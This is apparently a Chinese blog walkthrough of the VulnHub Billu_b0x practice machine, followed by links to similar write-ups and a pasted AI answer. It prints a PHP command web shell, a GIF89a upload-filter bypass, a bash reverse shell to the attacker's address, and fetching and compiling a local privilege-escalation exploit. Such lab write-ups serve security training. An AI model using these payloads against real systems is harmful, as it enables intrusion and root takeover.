VulnHub 靶场实战~Billu_b0x

已于 2024-02-26 17:01:47 修改
阅读量1.3k 收藏 31
点赞数 26
分类专栏: VulnHub 靶场实战 文章标签: 安全
于 2024-02-26 15:58:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_75030189/article/details/135705767
版权

billu_b0x靶场难度:适中;感觉很多东西还没掌握,后期继续完善!

一、环境配置

攻击机:kali (192.168.153.138)

官网下载

靶机:Billu_b0x(192.168.153.149)

官方下载

百度网盘下载

提取码:wxhn(百度网盘下载解压后直接导入vmware就可以了)

攻击机和靶机都设置成nat模式

二、渗透过程

1、发现主机(nmap扫描)

nmap -sP 192.168.153.1/24

2、扫描目标主机开放端口

namp -sS 192.168.153.149

发现目标靶机开放了22、80端口

3、扫描端口开放服务

nmap -sV -T4 -O 192.168.153.136 -p 22,80

访问ip看一下(80是默认端口,访问的时候可以不加也可以加)

页面提示:how me your SQLI skills

尝试了一下万能密码SQL注入,但是没有成功,所以继续找其他思路

4、扫描目录(dirb是kali自带的目录扫描工具)

dirb http://192.168.153.136 /usr/share/wordlists/dirb/big.txt


5、看一下总共有几个可以带来有用的信息

http://192.168.153.149/in.php

http://192.168.153.149/phpmy

http://192.168.153.149/add.php

http://192.168.153.149/test.php

http://192.168.153.149/c.php

http://192.168.153.149/index.php

http://192.168.153.149/show.php

http://192.168.153.149/panel.php

http://192.168.153.149/in

http://192.168.153.136/phpmy

发现一个phpmyadmin的登陆页面,尝试弱口令但是进不去,我们没有账号和密码就先继续看其他目录

 http://192.168.153.136/c.php

空白页面,先放着

同样是空白页面,先放着

http://192.168.153.136/test

提示

'file' parameter is empty. Please provide file path in 'file' parameter

“file”参数为空,请在“file”参数中提供文件路径

尝试使用GET传参访问/etc/passw目录

GET传参失败,试一下POST传参

/etc/passwd的信息被下载下来了,可见此处存在任意文件下载

发现该目录存在任意文件下载漏洞,那么就有思路了,我们把前面几个文件都下载下来看一下,(此处用的是brupsuit抓包测试,也可以直接下载下来)

c.php

账号:billu

密码:b0x_billu

发现了个mysql的账号密码,让我们回到刚才的mysql管理平台页面试一下

成功拿到了登录页面的账号密码,回到web登录页面试一下

成功登录

在show users页面发现文件上传路径

add Users是个上传页面

<?php
system($_GET['cmd']);
?>

我们先上传一个一句话木马文件尝试一下

上传失败,并且给我们提示只能上传png、jpg、gif文件

那么我们就上传一个图片马,并且加上GIF89a绕过文件头检测

上传成功

然后用brupsuit抓show user包执行命令看一下

三、执行命令成功之后下一步就是反弹shell

1、kali命令行里输入nc -lvnp 9999开始监听

2、burp的post请求中执行echo “bash -i >& /dev/tcp/192.168.153.138/9999 0>&1” | bash,(注意要将此命令先经过URL编码才能发送,直接在burpsuit里面的Decoder就可以加密了)

3、反弹shell成功(但是只是普通权限)

4、很明显我们拿到的只是普通权限,接下来就是提权

cat /etc/issue(查看当前系统版本)

Ubuntu 12.04

5、重新在kali打开一个终端,使用 Kali 的漏洞查找工具(searchsploit)找到那个最适合该系统版本的

searchsploit Ubuntu 12.04

6、直接把37292.c文件copy到Apache的根目录下

cd /usr/share/exploitdb/exploits/linux/loca

cp 37292.c /var/www/html

7、开启kali的Apache服务

/etc/init.d/apache2 start

8、这里我们要先切换到临时目录,然后wget下载

cd /tmp
wget http://192.168.153.138/37292.c

9、然后编译执行,成功提权

gcc 37292.c -o abc
./abc

10、虽然已经是root权限但是目前还是半交互式,我们改成全交互式

python -c 'import pty;pty.spawn("/bin/bash")'

billu b0x靶场的渗透测试
L_lemo004的博客
07-12 839
扫描IP 由于我的内网网段为31,所以我使用ipscan工具扫描31段的存活主机 发现192.168.31.16疑似靶场IP,访问看看,成功访问,界面是白胡子 页面提示我们用SQL注入获取用户名密码,在输入框尝试注入,输入admin’ ,弹出try again提示框,说明无法注入 文件包含 无法注入,我们可以尝试爆破目录看看有没有什么突破点 得到页面较多,test.php、add.php、...
靶机渗透学习----Billu_b0x
qq_42133828的博客
06-07 3000
靶机下载地址及安装环境 靶机下载地址:https://download.vulnhub.com/billu/ 靶机环境:处于net网络下的VM虚拟机 渗透实战 攻击机:192.168.146.131 靶 机:192.168.146.133(扫描后得到的) 1.安装完后,由于不知道node靶机的地址,所以渗透第一步就是发现主机: 1)使用nmap快速扫描,发现存活主机: nma...
VulnHub渗透实战Billu_b0x
Fly_鹏程万里
06-06 7923
简介VulnHub是一个面向所有人开放的安全靶场,里面有很多安全环境,只要下载相关镜像,在相关虚拟机上面运行就可以练习相关靶场了。里面设计了好多关,如果有耐心一定可以到达峰顶。许多考oscp人员,也会利用vulnhub靶场进行刷题。我们下载了一个经典漏洞靶场,给大家进行演示,希望让初学者知道渗透测试的套路,可以更快的成长。官网:https://www.vulnhub.com/参考了一些国外设计靶场...
vulhub/Billu_b0x靶机----练习攻略
qq_65379983的博客
03-18 1138
Billu_b0x靶机攻略 文件上传漏洞 巧用蚁剑参数,构建请求包数据进行连接
VulnHub靶场渗透实战11-Billu_b0x
随心所欲不逾矩
07-31 2705
VulnHub靶场渗透实战11-Billu_b0x
CTF综合靶场渗透系列-Billu_b0x
lza20001103的博客
10-11 4452
CTF综合靶场渗透系列-Billu_b0x
Vulnhub靶机:Billu_b0x
qq_48904485的博客
03-06 891
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机:Billu_b0x(192.168.56.107)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/billu/Billu_b0x.zip。
Python操作MySQL与提权:Blumbergh用户下的数据库操纵与反弹Shell
Vulnhub是一个提供真实世界的安全漏洞环境的靶场平台,它包含了一系列的虚拟机镜像,如Breach1.0Billu_b0x等,供安全研究人员和爱好者进行实战练习和技能提升。通过这些练习,我们可以熟悉不同的攻击手法和防御...
Vulnhub靶机笔记01——Billu_b0x
2301_76329510的博客
04-16 1680
test。
billu_b0x靶场
qq_64470109的博客
03-19 281
扫描靶机IP访问一下,先看看再说扫描目录看完这几条目录,找出来一些可能要用的上传图片的目录遍历的php文件admin登录页面。
靶机实战-Billu_creat_Files
滕财然的博客
01-20 926
Billu_creat_Files靶机实战 文章目录Billu_creat_Files靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、80端口--http服务5、提权6、提权方式2 1、主机发现 目标IP:192.168.232.155 2、端口扫描 目标开放了22、80端口 3、端口详细信息扫描 22端口–ssh、80端口–http服务 4、80端口–http服务 访问主页: 只...
靶机练习之Billu_b0x
10-04
通过该靶场,能够初步了解web渗透的基本流程。小白在了解了web各种漏洞原理,之后,可以练习一下该靶场靶场做法很多。我也是一个小白,来这里记录一下学习的过程,不喜勿喷!!!感谢!!!
VulnHub靶场Billu_b0x
M_onster_d的博客
09-10 726
VulnHub靶场Billu_b0x 靶机下载地址 [https://download.vulnhub.com/billu/Billu_b0x.zip] 虚拟机配置 下载的虚拟机是 ova 格式,当然装载到 virtualbox 上最好,也可以装载到vmware workstation上,本人电脑上是workstation,所以装载到workstation上。 打开虚拟机的过程中,可以会出现 “未通过 OVF 规范一致性” 的版本问题,此时需要重新下载 ovftool 工具(忘了从哪下载了…但是网上可
Billu_b0x
weixin_43741181的博客
11-24 469
信息收集 扫描主机c段ip找到靶机ip地址 识别端口和服务 在22和80端口分别发现了SSH服务和web服务。 打开web页面,提示输入 漏洞发现 0x01.页面提示有注入,测试注入。 查看源码,没有发现, fuzz 以及很多尝试都没有结果。 0x02.爆破目录 用dirbuster爆破,发现很多页面,这里没有扫描完毕 0x03 获取源码 上述test.php中提示要传一个file...
vulnhub-Billu_b0x
qq_43006864的博客
03-27 922
题目:Billu_b0x 攻击机:kali-linux ip地址: 靶机:vulnhub-Billu_b0x 开始解题: 一、信息收集: nmap获取目标主机信息: 这一步主要获取目标主机的端口信息等,先对整段进行扫描。 这里刚开始没注意,靶机默认的事nat模式,我扫了半天一直扫不出来,大家做的时候注意一下。 这里看到103这里开了22和80端口,基本确定是靶机了。再进一步探测端口信息。 nmap -sS -sV -A -p- 192.168.1.103 出
Billu_b0x靶机实战攻略
2301_81383433的博客
03-18 249
打开cmd,切换到 1.jpg 和 2.asp 文件目录下,制作图片马。尝试登录数据库,登陆成功。查看c.php,发现了疑似数据库用户名密码及库名。将转码复制在 cmd= 后,反弹 shell。可能存在文件包含漏洞。发现用户名密码,尝试登录最初页面,登陆成功。进行url编码,同时打开Kali监听。点击continue,用BP抓包。尝试改用POST传参,包含成功。新建2.asp写入一句话木马。
Billu_b0x靶场复现
蘇同学的安全屋的博客
04-29 604
Billu_b0x靶场复现 环境准备: Billu_b0x,VMware虚拟机设置为nat模式,靶机自动获取ip地址 kali linux 2020虚拟机,ip地址192.168.120.133 kali linux 2020虚拟机,ip地址192.168.120.141 1.信息收集 nmap -sP 192.168.1.0/24 使用nmap扫描本网段主机,其中192.168.120.1为网卡地址,192.168.120.2为网关,133为本机地址,目标靶机ip为192.168.1.141 主机发现
靶机Billu入侵提权实战
没有网络安全就没有国家安全
03-08 755
靶机Billu入侵提权实战
billu_b0x下载百度
最新发布
03-19
<think>好的,我需要处理用户关于下载billu_b0x的请求。首先,用户提到想通过百度网盘下载这个资源,并引用了某个参考来源。根据引用内容,用户可能已经有一个百度网盘的链接,但需要提取码wxhn。不过,我需要验证这个链接是否仍然有效,以及资源是否安全合规。 接下来,我需要考虑用户可能遇到的问题。例如,链接失效、提取码错误,或者下载后的文件无法正确导入VMware。此外,用户可能对设置NAT模式的网络配置有疑问,或者渗透测试过程中遇到技术障碍。 另外,用户的需求可能不仅限于下载,还可能包括如何配置环境和进行后续的渗透测试步骤。因此,生成相关问题时,需要涵盖下载步骤、环境配置、常见问题解决以及实际应用场景。 最后,要确保回答符合系统级指令,正确使用LaTeX格式,并添加引用标识。同时,保持回答结构清晰,分步骤帮助用户解决问题,并保证信息的准确性和安全性。</think>关于billu_b0x靶场资源的下载与使用,根据引用内容中提供的信息[^1],具体操作步骤如下: 1. **百度网盘下载** - 访问百度网盘链接(需自行搜索最新有效链接) - 输入提取码:$wxhn$(注意字母大小写) - 下载后解压得到虚拟机文件 2. **虚拟机配置** ```bash # 设置NAT模式网络 VMware菜单栏 > 编辑 > 虚拟网络编辑器 > 选择NAT模式 ``` 需确保攻击机(如Kali Linux)和靶机使用相同的网络模式,配置示意图: $$ \begin{cases} \text{攻击机IP} \in 192.168.153.0/24\\ \text{靶机IP} \in 192.168.153.0/24 \end{cases} $$ 3. **渗透测试验证** 建议使用Nmap进行基础探测: ```python import nmap scanner = nmap.PortScanner() scanner.scan('192.168.153.0/24', arguments='-sP') ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值